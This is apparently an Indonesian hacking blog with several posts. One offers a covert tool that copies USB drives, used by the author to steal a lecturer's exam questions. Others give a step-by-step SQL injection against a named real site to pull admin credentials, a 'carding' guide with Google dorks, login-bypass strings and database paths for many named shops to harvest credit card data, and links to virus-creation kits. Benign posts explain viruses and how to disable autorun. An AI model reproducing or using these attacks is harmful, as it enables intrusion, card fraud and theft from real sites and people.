Selasa, 27 Mei 2008

Tool Pencuri Data Flashdisk

Pernahkah terpikir oleh anda untuk mengambil isi flashdisk orang lain tanpa izin atau secara ilegal....???

Tool yang saya buat dengan Bahasa Pemrograman Visual Basic ini berfungsi untuk mengambil isi Flashdisk agar meng-Copy secara otomatis ke hardisk. cara menggunakannya sangat mudah sekali. Simpan tool ini di Folder komputer kalian (terserah mau di directory mana aja). setelah itu tinggal klik2kali, jika ada flashdisk yang masuk di komputer tersebut maka data yang ada di flashdisk tersebut akan ter-Copy secara otomatis ke dalam folder dimana anda menyimpan tool ini tadi. tentunya tanpa sepengetahuan yang punya flashdisk.. hehehe..

Pernah saya Ujicoba, ketika itu saya mau ujian akhir Semester , naah pada pertemuan Terakhir suatu matakuliah. Komputer yang ada dikelas saya taruh tool ini, kemudian sebelum pak Dosen masuk tool ini saya aktifkan.. ketika akan memulai kuliah, akhirnya saat yang saya tunggu2 datang juga.. pak Dosen menColokkan Flashdisknya ke komputer kelas yang sudah saya pasang Tool ini.. Setelah Jam kuliah berakhir, saya langsung mengecek Komputer tersebut.. Apa Yang terjadi..........???? seluruh isi Flashdisk Dosen saya itu Tercopy secara otomatis ke Hardisk komputer.. tanpa sepengetahuan dari pak Dosen tentunya .. huehuehue...
Kemudian saya ambil isi dari Flashdisk Dosen tersebut dan saya Buka di Kost.. Ternyata Flashdisk tersebut berisi File Soal2 yang sudah di ketik rapi dan akan di Keluarkan pada ujian Akhir..... waaaaaaaaaaaaaaaaaaaaaaaaaaaaahh.. saya
senangnya bukan main.......!!!!!!!!! huehuehuehuehue........

pesen dari saya : silahkan anda download tool ini dan Gunakan Seperlunya saja.. saya tidak bertanggungjawab atas segala tindakan penyalahgunaan toll ini..


Untuk mendownload tool ini silahkan anda Klik disini.
dengan password : zifoeproduction

saran dan kritik kirim ke email : zifoe@yahoo.com
Baca Selengkapnya >>... Agregar a facebook

Senin, 26 Mei 2008

SQL Injection

SQL injection (PHP)

siapkan secangkir kopi dan sebungkus roko...klo bisa sebelah cewe...biar semangat!! yuks mulai aja ptama2 cari site yg mau di inject.

contoh: http://www.zaishu.com.au/shop.php?id=41

skarang tambahkan tanda - di blakang angka 41

http://www.zaishu.com.au/shop.php?id=41-

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY iorder ASC' at line 1 keluar tulisan itu.. kemungkinan bisa di inject nih.. yuk mulai aja...

query pertama kita gunakan UNION SELECT

http://www.zaishu.com.au/shop.php?id=-41+union+select+1/**

nah disini kita mencari angka ajaib..kalo blom kluar terusin nomor setelah select http://www.zaishu.com.au/shop.php?id=-41+union+select+1,2/**

terusin sampe kluar angka ajaibna ternyata sampe di angka 14 h

ttp://www.zaishu.com.au/shop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/**

nah angka ajaib yg kluar 4,5 dan 11 angka2 inilah yg nanti digunakan.

nah setelah dapet kita cari version,user,database dengan memasukkan query ke angka ajaib tersebut * version() : current mysql version * database() : current database where user is connected * user() : connected to the database * system_user() : obvious * session_user() * current_user() * last_insert_id() * connection_id()

kali ini saya akan menggunakan angka 11

http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,version(),12,13,14/** nah ternyata version 5 sip deh..lanjut lagi... cek database dan nama usernya http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,database(),user(),6,7,8,9,10,version(),12,13,14/** karna angka ajaib ada 3,kita gunakan aja semua... hasilnya

zaishu_zaishu zaishu_user@localhost 5.0.45-community

skarang kita ngeluarin tablenya yang kita cari adalah table admin..ok? query yg kita gunakan adalah table_name from information_schema.tables where table_schema=database() limit 0,1/* ok langsung masukin aja.. http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1/** nah ternyata keluar table address_book ok lanjut lagi... untuk ngeluarin table berikutnya tinggal di tambahin limitnya menjadi 1,1 2,1 dan seterusnya. kali ini kita akan mencari table admin.. ternyata sampai 2,1 kluar table admin dengan nama adminrights sekarang kita cari columnnya. query yg kita gunakan adalah column_name from information_schema.columns where table_name=’table_name’ limit 0,1/* nah table name yg kita cari tadi adalah adminrights kita rubah dlu menjadi bilangan hexa menjadi 0x61646d696e726967687473 jadi skarang tinggal kita masukkan. http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14+from+information_schema.columns+where+table_name=0x61646d696e726967687473+limit+0,1/* nah ternyata kluar column id selanjutnya kita tinggal tambahkan limitnya menjadi 1,1 2,1 dst akan kluar column username,password langkah selanjutnya tinggal kita kluarin datanya. kita akan menggunakan query concat() akan menjadi seperti ini

http://www.zaishu.com.aushop.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,10,concat(username,0x2D2D,password),12,13,14+from+adminrights/** Ups,..ternyata kluar login dan password admin

PS: tanda + hanya sebagai pemisah bisa di ganti dengan spasi dan tanda 0x2D2D juga sebagai pemisah pada query concat.





Thank to all crew #purwokertohackerlink #indohackerlink #indohackerlinkcrew #batamhacker etc

Baca Selengkapnya >>... Agregar a facebook

Tutorial Carding Lengkap

Contoh bugs pada bentuk toko system : shopadmin





Ketik keyword google : allinurl:/shopadmin.asp

Contoh target : www.Target.com/shopadmin.asp

user : 'or'1

pass : 'or'1







Contoh bugs pada bentuk toko sistem : Index CGI



Ketik keyword google : allinurl:/store/index.cgi/page=

Contoh target : http://www.Target.com/cgi-bin/store/...short_blue.htm

Hapus short_blue.htm dan ganti dengan :./admin/files/order.log

Hasilnya:http://www.Target.com/cgi-bin/store/...iles/order.log







Contoh bugs pada bentuk toko sistem : metacart



Ketik keyword google.com : allinurl:/metacart/

Contoh target : www.Target.com/metacart/about.asp

Hapus moreinfo.asp dan ganti dengan : --> /database/metacart.mdb

Hasilnya : /www.Target.com/metacart/database/metacart.mdb







Contoh bugs pada bentuk toko sistem ""CShop



Ketik keyword google.com : allinurl:/DCShop/

Contoh : www.Target.com/xxxx/DCShop/xxxx

Hapus /DCShop/xxxx dan ganti dengan

/DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt

Hasilnya : www.Target.com/xxxx/DCShop/orders/orders.txt







Contoh bugs pada bentuk toko sistem : EShop



Ketik keyword google.com : allinurl:/eshop/

Contoh : www.Target.com/xxxxx/eshop

Hapus /eshop dan ganti dengan : /cg-bin/eshop/database/order.mdb

Hasilnya : http://www.Target.com/.../cg-bin/esh...base/order.mdb

Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk
membaca database access.mdb sebaiknya pake ms access aja)









Contoh bugs pada bentuk toko sistem : PDshopro



Ketik keyword google.com : allinurl:/shop/category.asp/catid=

Contoh : www.Target.com/shop/category.asp/catid=xxxxxx

Hapus /shop/category.asp/catid=xxxxxx dang ganti dengan : /admin/dbsetup.asp

Hasilnya : www.Target.com/admin/dbsetup.asp

Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb

Download file sdatapdshoppro.mdb dengan merubah url nya menjadi

www.Target.com/data/pdshoppro.mdb

Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb
sebaiknya pake ms access aja)







Contoh bugs pada bentuk toko sistem : commerceSQL



Ketik keyword google.com : allinurl:/commercesql/

Contoh : www.Target.com/commercesql/xxxxx

Hapus commercesql/xxxxx dan ganti dengan: cgi-bin/commercesql/index.cgi?page=

Hasilnya : http://www.Target.com/cgi-bin/commer...ndex.cgi?page=

Untuk melihat admin config

http://www.Target.com/cgi-bin/commer.../admin_conf.pl

Untuk melihat admin manager

http://www.Target.com/cgi-bin/commer...in/manager.cgi

Untuk melihat file log/CCnya

http://www.Target.com/cgi-bin/commer...iles/order.log







Contoh bugs pada bentuk toko sistem : Cart32 v3.5a



Ketik keyword google.com : allinurl:/cart32.exe/

Contoh : http://www.Target.net/wrburns_s/cgi-...xe/NoItemFound

Ganti NoItemFound dengan : error

Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita
sukses!

Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan
cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file
dgn format

/akhiran.c32 berarti di site tsb. terdapat file berisi data cc

Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text
editor lainnya.

Ganti string url tsb. menjadi seperti ini : http://www.
Target.net/wrburns_s/cgi-bin/cart32/

Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi,
dengan format

http://www.Target.com/cart32/

Contoh http://www.Target.net/wrburns_s/cgi-...RNS-001065.c32







Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0



Ketik keyword google.com : allinurl:/vpasp/shopdisplayproducts.asp

Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp



Contoh :

http://Target.com/vpasp/shopdisplayp...39;a%25'--



Gantilah nilai dari string url terakhir dg:

: %20'a%25'--

: %20'b%25'--

: %20'c%25'--

Kalau berhasil, kita akan mendapatkan informasi username dan password admin

Untuk login admin ke http://Target.com/vpasp/shopadmin.asp

silahkan Cari sendiri data CCnya







Contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0



Ketik keyword google.com : Ketik --> allinurl:/vpasp/shopsearch.asp



Buka url target dan utk membuat admin baru, postingkan data berikut satu per
satu pada bagian search engine :



Keyword=&category=5); insert into tbluser (fldusername) values

('')--&SubCategory=&hide=&action.x=46&action.y=6



Keyword=&category=5); update tbluser set fldpassword='' where

fldusername=''--&SubCategory=All&action.x=33&action.y=6



Keyword=&category=3); update tbluser set fldaccess='1' where

fldusername=''--&SubCategory=All&action.x=33&action.y=6



Jangan lupa untuk mengganti dan nya terserah kamu.

Untuk mengganti password admin, masukkan keyword berikut :



Keyword=&category=5); update tbluser set fldpassword='' where

fldusername='admin'--&SubCategory=All&action.x=33&action.y=6



Untuk login admin, ada di http://Target/vpasp/shopadmin.asp







Contoh bugs pada bentuk toko sistem : Lobby.asp





Ketik keyword google.com : allinurl: Lobby.asp

Contoh : www.Target.com/mall/lobby.asp

Hapus tulisan mall/lobby.asp dan ganti dengan : fpdb/shop.mdb

Hasilnya : www.Target.com/fpdb/shop.mdb







Contoh bugs pada bentuk toko sistem : Shopper.cgi





Ketik keyword google.com : allinurl: /cgi-local/shopper.cgi

Contoh : http://www.Target.com/cgi-local/shop...dd=action&key=

Tambah dengan :...&template=order.log

Hasilnya :

http://www.xxxxxxxx.com/cgi-local/sh...late=order.log







Contoh bugs pada bentuk toko sistem :Proddetail.asp





Ketik keyword google.com : allinurl""roddetail.asp?prod=

Contoh : http://www.Target.org/proddetail.asp...ACSASledRaffle

Hapus tulisan proddtail.asp?prod=SG369

dan ganti dengan --> fpdb/vsproducts.mdb

Hasilnya : www.Target.org/fpdb/vsproducts.mdb









Contoh bugs pada bentuk toko sistem ""igishop





Ketik keyword google.com : inurl:"/cart.php?m="

Contoh : http://Target.com/store/cart.php?m=view.

Hapus tulisan cart.php?m=view

dan ganti dengan -->admin

Hasilnya http://Target.com/store/admin



Trus masukin username sama pass nya pake statment SQL injection



Usename : 'or"="

Password : 'or"="



setelah bisa login, cari data yang diperlukan .







Contoh bugs pada bentuk toko sistem : Index CGI



Ketik keyword google.com : allinurl:store/index.cgi/page=

Bugs : ../admin/files/order.log

Example : http://www.target.com/cgi-bin/store/...ir_Manuals.htm

masukin bugsnya : http://www.target.com/cgi-bin/store/...iles/order.log

trus copy-paste tuch log'nya di notepad biar gampang di baca







Contoh bugs pada bentuk toko sistem : Index Cart



Ketik keyword google.com : inurl:"/cart.php?m="

Bugs : Admin

ganti tulisn cart.php?m=view dengan admin

login pake SQl Injection :

username :'or"="

Passwordnya :'or"="

contoh target buat kalian :

https://www.therustybucket.biz/store/admin







Contoh bugs pada bentuk toko sistem : Index cart





Ketik keyword google.com : /ashopKart20/"

bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb

example www.garrysun.com/ashopkart20/addprod.asp

Injection : selanjutnya masukin bugs di atas jadi : www.garrysun.com/ashopkart20/admin/scart.mdb

kalo berhasil loe dapet file beresktension .mdb nach file itu

tmn2 open with MS-Acces







Contoh bugs pada bentuk toko sistem : Catid



Ketik keyword google.com : /shop/category.asp/catid=

Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp

example : www.littlesport.net/shop/category.asp?catid=2

masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp

kalo berhasil dapet file.mdb trus buka pake MS - Access tapi kalo gagal berarti

dah keduluan ma carder yang lain... cari target lain ok..??







Contoh bugs pada bentuk toko sistem : Store



Ketik keyword google.com : inurl:"/store/proddetail.asp?prod="

bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb

Example : http://www.successlink.org/store/pro...prod=SL-IP0001

masukin bugsnya www.successlink.org/store/fpdb/vsproducts.mdb

download file .mdbnya trus buka pake MS- ACCESS..







Contoh bugs pada bentuk toko sistem : Sunshop



Ketik keyword google.com : "Powered by SunShop 3.2"

Atau google dork : inurl:"/sunshop/index.php?action="

Bugs : ganti kata index.php dgn admin

kl ada peringatan java script error klik "OK" aja

Contoh buat kalian : http://www.dohertysgym.com/sunshop/index.php

ganti dengan admin http ://www.dohertysgym.com/sunshop/admin

Login pake SQL Injection :

Username : admin

Password :'or''='







Contoh bugs pada bentuk toko sistem : digishop



Ketik keyword google.com

Ketik keyword google.com : "Powered by Digishop 3.2"

Bugs : hapus tulisan cart.php?m= dengan admin

Login pake SQL Injection :

Username : 'or"="

Password : 'or"="

Contoh target :

http://uniquescrapbooks.com.au/store/admin

http://www.7footserb.com/shop/admin

https://www.tangerineclothing.com/admin







Contoh bugs pada bentuk toko sistem :Lobby



Ketik keyword google.com : inurl:"mall/lobby.asp"

bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb

example : Gem Depot Lobby Page - Search our Inventory

jadi http://www.gemdepot.com/fpdb/shop.mdb

dapat dech .mdb ===> trus klik open database JANGAN klik "convert databese"
===> klk view orders ====> trus cari orang yg pernah belanja contoh pada
customer no 36 trus dimana no CCnya badKiddes....

sabar bro... masih di table customer no 36 then klik payment

*yang ini udah di patch jadi udah ngga bisa lg silakan cari lagi korban lainnya
Baca Selengkapnya >>... Agregar a facebook

Minggu, 18 Mei 2008

Pemahaman Virus

Pada dasarnya, virus komputer adalah sebuah program komputer yang memiliki kemampuan untuk menggandakan diri dengan cara menyisipkan programnya kedalam sebuah file lain. Mirip seperti virus biologis, virus komputer dapat menyebar dengan cepat pada file-file dalam sebuah komputer, atau bahkan menulari file di komputer lain, baik melalui jaringan maupun lewat kegiatan tukar-menukar file.

Dahulu kita mengenal pembagian virus berdasarkan sasaran penyebarannya, yaitu virus boot sector dan virus file. Virus boot sector didesain oleh pembuatnya untuk menginfeksi boot sector, yakni bagian dari sebuah media penyimpanan (disket, hard disk) yang pertama kali dibaca oleh sistem operasi saat media tersebut diakses. Sekali media penyimpanan yang terinfeksi oleh virus jenis ini dipakai untuk melakukan booting, maka virus pun menetap di memory dan siap menginfeksi media penyimpanan lain yang digunakan di komputer yang sama. Belakangan, virus boot sector berkembang menjadi tipe yang lebih ganas, yaitu yang dikenal sebagai virus partisi (partition table). Tabel partisi adalah bagian pada hard disk yang menyimpan data-data CHS (cylinder/head/sector) yang menjadi pedoman bagi sistem operasi untuk melakukan proses pembacaan. Sekali bagian ini dihancur-leburkan oleh virus, maka tentunya hard disk tidak lagi dapat dibaca dan seluruh data didalamnya pun melayang.

Sementara itu, virus file bekerja dengan cara menyisipkan programnya dalam sebuah file. Dahulu, saat penggunaan sistem operasi DOS masih meluas, sasaran virus jenis ini adalah file-file executable, yakni yang namanya berakhiran dengan ekstensi .COM atau .EXE. Selain melakukan penularan, virus file seringkali menambahkan perintah-perintah tertentu pada kode program yang ditularinya. Umumnya virus semacam ini memiliki sifat sebagai "bom waktu", dimana program virus akan melakukan aksinya pada waktu-waktu tertentu yang telah ditentukan oleh si programmer. "Aksi" ini bisa bermacam-macam, mulai dari yang ringan seperti menampilkan pesan dan membunyikan speaker, hingga melakukan perusakan dengan menghapus data, atau bahkan memformat hard disk!

Belakangan, saat penggunaan program berbasis Windows mulai marak dengan aneka macam fitur, maka kita kembali mengenal satu jenis virus baru, yakni virus macro. Macro adalah serangkaian perintah--mirip perintah dalam bahasa pemrograman--yang disediakan oleh perangkat lunak yang memungkinkan penggunanya untuk menyusun suatu rangkaian pekerjaan tertentu. Rangkaian perintah tersebut akan dijalankan sekaligus oleh perangkat lunak saat macro dijalankan. Fasilitas macro berguna untuk memudahkan pengguna dalam melakukan langkah-langkah yang berurutan dan berulang-ulang. Celakanya, fasilitas ini akhirnya disalah gunakan oleh tangan-tangan jahil untuk membuat macro yang berisi perintah-perintah penularan dan bahkan perusakan!

Jenis virus macro yang terkenal adalah virus WordMacro yang khusus dibuat untuk menginfeksi file data dari perangkat lunak pengolah kata Microsoft Word (berekstensi .DOC). Virus jenis ini memiliki hingga ribuan varian dengan aneka macam jenis gangguan. Mulai dari yang hanya menampilkan pesan pada waktu-waktu tertentu, hingga melakukan perusakan pada file. Virus WordMacro tergolong memiliki varian paling banyak karena kode-kodenya yang mudah untuk dimodifikasi. Disamping itu, mempelajari macro pada MS Word tidaklah sesulit mempelajari bahasa Assembly atau C (bahasa pemrograman yang sering digunakan untuk membuat program virus).

TROJAN HORSE DAN WORM

Selain virus dalam artian seperti disebut diatas, kita juga mengenal program yang disebut Trojan Horse (Kuda Troya). Trojan Horse sebenarnya bukanlah sebuah virus dalam artian sesungguhnya, karena program ini tidak memiliki kemampuan untuk menggandakan dirinya ke program lain. Namun demikian, program ini tidak kalah berbahaya jika dibandingkan dengan program virus komputer.

Trojan Horse umumnya dikemas dalam bentuk sebuah program yang menarik. Namun dibalik daya tarik software tersebut, tersembunyi fungsi lain untuk melakukan perusakan. Pengguna komputer yang mendapatkan file ini umumnya akan terpancing untuk menjalankannya. Akibatnya tentu fatal, karena dengan demikian si pengguna telah meenjalankan rutin-rutin perusak yang siap menebar bencana di komputernya.

Sumber malapetaka lain yang mirip dengan virus (namun tidak bisa dikatagorikan sebagai virus) adalah worm. Worm biasa menyebar melalui e-mail, berupa sebuah program kecil yang diattachkan pada sebuah pesan e-mail. Pengguna yang tertarik akan menjalankan program tersebut. Selanjutnya, bisa ditebak, si program akan langsung melakukan aksinya. Worm akan menggandakan diri dengan mengirimkan filenya secara otomatis melalui attachment ke setiap alamat yang ada dalam address book pada software e-mail korban. Umumnya worm tidak bersifat merusak, namun demikian selain mengakibatkan kejengkelan di pihak korban, serangan worm dapat sangat berbahaya bagi mailserver. Berjangkitnya worm menyebabkan beban kerja mailserver melonjak drastis hingga dapat mempengaruhi performanya.

Worm umumnya berbentuk file executable (berekstensi .EXE datau .SCR), yang terlampir (attach) pada email. Namun demikian, ada beberapa jenis worm yang berbentuk script yang ditulis dalam bahasa Visual Basic (VBScript). Sasaran serangan worm jenis ini terutama adalah perangkat lunak e-mail Microsoft Outlook Express.

ANTI VIRUS

Dewasa ini, berbagai perangkat lunak telah tersedia di pasaran sebagai penangkal terhadap serangan virus. Program ini biasanya bekerja dengan cara memindai (scan) sebuah file dan mencocokkannya dengan ciri-ciri virus yang ada dalam databasenya. Bagian lain dari program anti virus merupakan program yang menetap (residen) di memory komputer. Bagian ini berfungsi untuk memonitor aktivitas baca-tulis pada media penyimpanan terhadap adanya "anomali" yang mungkin disebabkan oleh adanya virus. Tidak semua virus dapat dihilangkan oleh anti virus. Beberapa jenis virus melakukan penimpaan (overwrite) terhadap file yang ditularinya. File yang terjangkit virus jenis ini mustahil untuk dapat diperbaiki.

Beberapa jenis virus diracang untuk mengelabui program-program anti virus yang ada saat ini. Virus jenis ini diantaranya adalah tipe stealth dan polymorphic. Virus tipe stealth (siluman) bekerja dengan mengelabui sistem seolah-olah sebuah file berada pada kondisi normal sehingga virus tidak terdeteksi oleh program anti virus, walaupun pada kenyataannya file tersebut telah terinfeksi. Sementara itu virus bertipe polymorphic mampu untuk mengubah ciri-cirinya setiap kali menulari sebuah file. Dengan selalu mengubah dirinya, sang programmer virus berharap dapat menyulitkan para pembuat anti virus dalam mengenali ciri-ciri virus buatannya. Beberapa jenis virus menggunakan gabungan dari kedua teknik ini yang kemudian digolongkan sebagai virus tipe hybrid (campuran).

Bagaimanapun perang antara pembuat virus dengan pembuat antinya akan terus berlanjut. Pembuat virus jelas selalu berada selangkah didepan, sementara pembuat anti virus juga tidak mau ketinggalan untuk terus meneliti dan membuat penangkal untuk virus-virus baru. Dewasa ini setidaknya 200 virus baru muncul setiap bulannya. Ada kecurigaan yang beredar dikalangan pengguna komputer bahwa sebenarnya para pembuat anti virus justeru "berkomplot" dengan para programmer virus untuk meningkatkan penjualan produknya, namun demikian sejauh ini dugaan tersebut belum pernah terbukti kebenarannya.

MENGHINDARI ANCAMAN VIRUS

Sebagai pengguna komputer, ada beberapa langkah yang dapat kita lakukan untuk menghindari sistem kita dari ancaman virus maupun akibat-akibat buruk yang ditimbulkannya:

1. Pasang Anti Virus pada sistem anda
Sebagai perlindungan di garis depan, penggunaan anti virus adalah wajib. Ada banyak anti virus yang beredar di pasaran saat ini. Beberapa yang cukup handal diantaranya adalah McAfree VirusScan (www.mcafee.com) dan Norton Anti Virus (www.symantec.com).

2. Update database program anti virus secara teratur
Ratusan virus baru muncul setiap bulannya. Usahakan untuk selalu meng-update database dari program anti virus yang anda gunakan. Database terbaru dapat dilihat pada website perusahaan pembuat program anti virus yang anda gunakan.

3. Berhati-hati sebelum menjalankan file baru
Lakukan scanning terlebih dahulu dengan anti virus sebelum menjalankan sebuah file yang didapat dari mendownload di internet atau mengkopi dari orang lain. Apabila anda biasa menggunakan sarana e-mail, berhati-hatilah setiap menerima attachment dalam bentuk file executable. Waspadai file-file yang berekstensi: *.COM, *.EXE, *.VBS, *.SCR, *.VB. Jangan terkecoh untuk langsung membukanya sebelum melakukan scanning dengan software anti virus.

4. Curigai apabila terjadi keanehan pada sistem anda
Menurunnya performa sistem secara drastis, khususnya saat melakukan operasi pembacaan/penulisan file di disk, serta munculnya masalah pada software saat dioperasikan bisa jadi merupakan indikasi bahwa sistem telah terinfeksi oleh virus. Berhati-hatilah!

5. Backup data anda secara teratur
Tips ini mungkin tidak secara langsung menyelamatkan data anda dari ancaman virus, namun demikian akan sangat berguna apabila suatu saat virus betul-betul menyerang dan merusak data di komputer yang anda gunakan. Setidaknya dalam kondisi tersebut, anda tidak akan kehilangan seluruh data yang telah anda backup sebelumnya.
Baca Selengkapnya >>... Agregar a facebook

Top 10 Virus, Juni 2008 versi PCMAV

Virus lokal urutan pertama masih ditempati oleh Amburadul. Sementara di posisi kedua dan ketiga hanya terjadi pertukaran tempat antara virus Bluevhentexi dan Euis. Memang pada periode ini dirasakan tingkat penyebaran virus jenis VBScript sudah mulai menurun, terbukti hanya satu virus VBScript saja yang masuk dalam 10 besar virus kali ini. Berikut daftar selengkapnya:
1. Amburadul
Virus Amburadul mengubah caption Internet Explorer.

Virus yang hadir dengan lambang menyerupai icon default untuk file gambar ini, akan membuat direktori baru untuk menaruh file - file induknya dengan nama ~A~m~B~u~R~a~D~u~L~² yang berada di bawah direktori System32 Windows. Nama file induk virus juga dibuat menyerupai file system Windows seperti csrss.exe, lsass.exe, winlogon.exe dan lain sebagainya. Dalam aksinya, ia akan membuat file duplikat atas dirinya pada root drive, misalnya dengan nama Friendster Community.exe, J3MbataN K4HaYan.exe, MyImages.exe, dan banyak nama file lainnya terutama yang berbau pornografi untuk menarik perhatian user. Untuk memberitahu kehadirannya, virus ini pun akan menampilkan pesannya pada caption di Internet Explorer. Dan hati-hati, karena ia dapat menghapus file gambar dan video yang Anda miliki. Beberapa extension file yang terbukti ia hapus adalah TIF, AVI, MP4, WMV, MPG, MPEG, VBS, dan EML.
2. Blueventhexi
Pesan yang muncul saat startup Windows ketika terinfeksi oleh virus Bluventhexi.Virus lokal yang satu ini memiliki ukuran file sebesar 36.864 bytes, tanpa di-packing. Dibuat menggunakan Visual Basic, dan menggunakan icon yang mirip seperti icon folder standar bawaan Windows. Sekilas, virus ini ada kesamaan dengan virus BlueFantasy. Pada komputer terinfeksi, Windows akan menampilkan pesan dari sang virus saat memulai Windows. Pesan tersebut juga bisa Anda temukan pada folder StartUp dengan nama “BluVenTheXi 10 Mei 2008 Surabaya.txt”.
3. Euis
Pesan yang muncul ketika terinfeksi virus Euis.Virus yang di-compilecompress. Pada komputer terinfeksi, virus ini akan menampilkan pesannya di awal. Ia juga akan menghilangkan beberapa menu dari Start Menu, memblokir akses ke beberapa tools Windows seperti Task Manager, Regedit, Folder Options, dan juga mencoba untuk menyingkirkan antivirus yang kemungkinan terpasang di komputer korban. Diketahui, virus ini pun dapat menginfeksi file executable lainnya dengan cara menaruh file yang diinfeksi di bawah tubuhnya. menggunakan Visual Basic ini memiliki ukuran file yang terbilang sangat besar, yakni sekitar 3,4Mb tanpa di-
4. Ninta
Wujud file virus Ninta yang terlihat pada Windows Explorer.

Virus lokal yang menggunakan icon mirip file aplikasi Microsoft Word ini dibuat menggunakan Visual Basic. Ia memiliki ukuran tubuh sekitar 53.248 bytes tanpa di-packer. Saat komputer terinfeksi oleh virus ini, pada direktori System32 akan terdapat sebuah direktori baru lagi dengan nama F41 yang sebenarnya ber-attribut hidden. Pada direktori tersebut akan terdapat 2 buah file, yang pertama svchost.exe yang tak lain merupakan file induk virus, dan satu lagi adalah file MSVBVM60.dll. Kedua file ini juga dengan attribut hidden. Ia juga akan mencoba membuat file autorun.inf dan explorer.exe di setiap drive dan akan mem-blok akses ke Command Prompt, Find/Search, dan beberapa aplikasi lainnya yang memiliki caption seperti Process Viewer.
5. Scootr
Pesan yang disampaikan oleh virus Scootr.
Virus ini dibuat menggunakan Visual Basic dengan icon menyerupai gambar folder. Ia memiliki ukuran file sebesar 159.744 tanpa di-compress. Jika dilihat sekilas ada beberapa kemiripan dengan virus Aksika, kemungkinan memang varian atau hasil modifikasi. Pada komputer terinfeksi, pada root directory akan terdapat file Puisi.txt yang merupakan pesan dari si pembuat virus. Jika PCMAV tidak bisa running sebagaimana mestinya, coba rename terlebih dahulu filenya agar tidak di-blok oleh virusnya.
6. Quick
Tampilan file virus Quick yang menyerupai file video.Virus berlambangkan mirip file video ini memiliki ukuran tubuh yang cukup kecil, yakni 19.456 bytes, dalam keadaan terkompresi menggunakan UPX. Pada komputer terinfeksi, di root drive system (C:) akan terdapat file induk virus dengan nama seperti ccinfo.exe, readme.txt, version.sys, windriver.exe, stba_cihampelas.3gp.exe, 3gp.sys, dan masih banyak lagi yang lainnya.
7. Valeria
Valeria terkadang menampakan diri di system tray.

Virus yang dibuat menggunakan Visual Basic ini berukuran 143.360 bytes, murni tanpa di-compress. Virus yang dikenal menggunakan icon mirip folder ini terkadang menampakan iconnya pada system tray Windows. Pada komputer terinfeksi, akan terdapat file Msoffice.exe di folder StartUp yang ada di Start Menu.
8. Gen.FFE
Salah satu isi file pesan dari salah satu variant virus yang dibuat menggunakan Gen.FFE.

Gen.FFE atau pembuatnya menamakan Fast Firus Engine merupakan salah satu program Virus Generator buatan lokal. Dengan hanya menggunakan program ini, tidak dibutuhkan waktu lama untuk dapat menciptakan virus/varian baru. Virus hasil keluaran program ini menggunakan icon mirip gambar folder standar bawaan Windows. Ia pun akan memblokir akses ke Task Manager, Command Prompt, serta menghilangkan beberapa menu di Start Menu. Ia juga akan membaca caption dari program yang aktif, apabila terdapat string yang berhubungan dengan antivirus maka program tersebut akan segera ditutup olehnya.
9. Joniezz
File autorun.inf yang dibuat oleh virus Joniezz.

Virus berlambang mirip file dokumen Microsoft Word ini dibuat menggunakan Visual Basic. File induknya yang memiliki ukuran sebesar akan terdapat di direktori \System32\LoLOxz dengan nama smss.exe. Ia akan mencoba mengubah Registry dengan menonaktifkan fungsi Find/Search Windows serta Command Prompt. Ia juga akan membaca setiap program yang berjalan, apabila ditemukan program yang mengancam kelangsungan hidupnya seperi misalnya Process Explorer, maka akan segera ia bunuh. Ia pun tidak lupa membuat file autorun.inf pada beberapa drive agar mempermudahnya aktif dan menyebarkan diri.
10. Novi.vbs
Pesan dari virus Novi.vbs yang muncul pada caption Internet Explorer.

Virus lokal jenis VBScript ini memiliki ukuran file sebesar 3698 bytes. Jika flash disk Anda terinfeksi, maka akan terdapat file NOVI.dll.vbs dan autorun.inf di root flash disk tersebut. Dan ia pun menampakan kehadirannya melalui caption Internet Explorer yang bertuliskan “Hacked by Novi PW”.
Baca Selengkapnya >>... Agregar a facebook

Men-disable Autorun pada USB

Pada flash disc yang terkena virus biasanya (tidak selalu) terdapat file autorun.inf yang di dalamnya terdapat perintah untuk menjalankan program virus. Nah, ketika flash disc tersebut dimasukkan ke drive USB yang fitur autorun-nya tidak di-disable maka secara otomatis Windows akan menjalankan program pada background tanpa adanya konfirmasi kepada user.

Salah satu cara untuk mengurangi resiko terkena virus tersebut adalah dengan mendisable fitur autorun pada drive USB. Ada pun caranya adalah sebagai berikut:

Disable Auto Run pada USB Drive

  1. Klik tombol Start - Run.
  2. Ketik gpedit.msc dan tekan OK.
  3. Klik pada User Configuration - Administrative Templates - System.
  4. Klik 2x pada Turn Off Autoplay.
  5. Klik pada option Enable.
  6. Pada option Turn off Autoplay on, pilih All drives.
  7. Klik OK.
  8. Selesai.



Baca Selengkapnya >>... Agregar a facebook

Virus Creation Tools

Bagi Temen2 yang mau Buat virus Dengan cara mudah... silahkan download software2 pembuat virus dibawah ini... Gratisssssss..!!! tiss........!!!

Access Macro Generator
Acid Flowing Trojan Generator
Advanced Batch Mutator
Advanced Steam Trojan Generator
Alchemic Life Generator
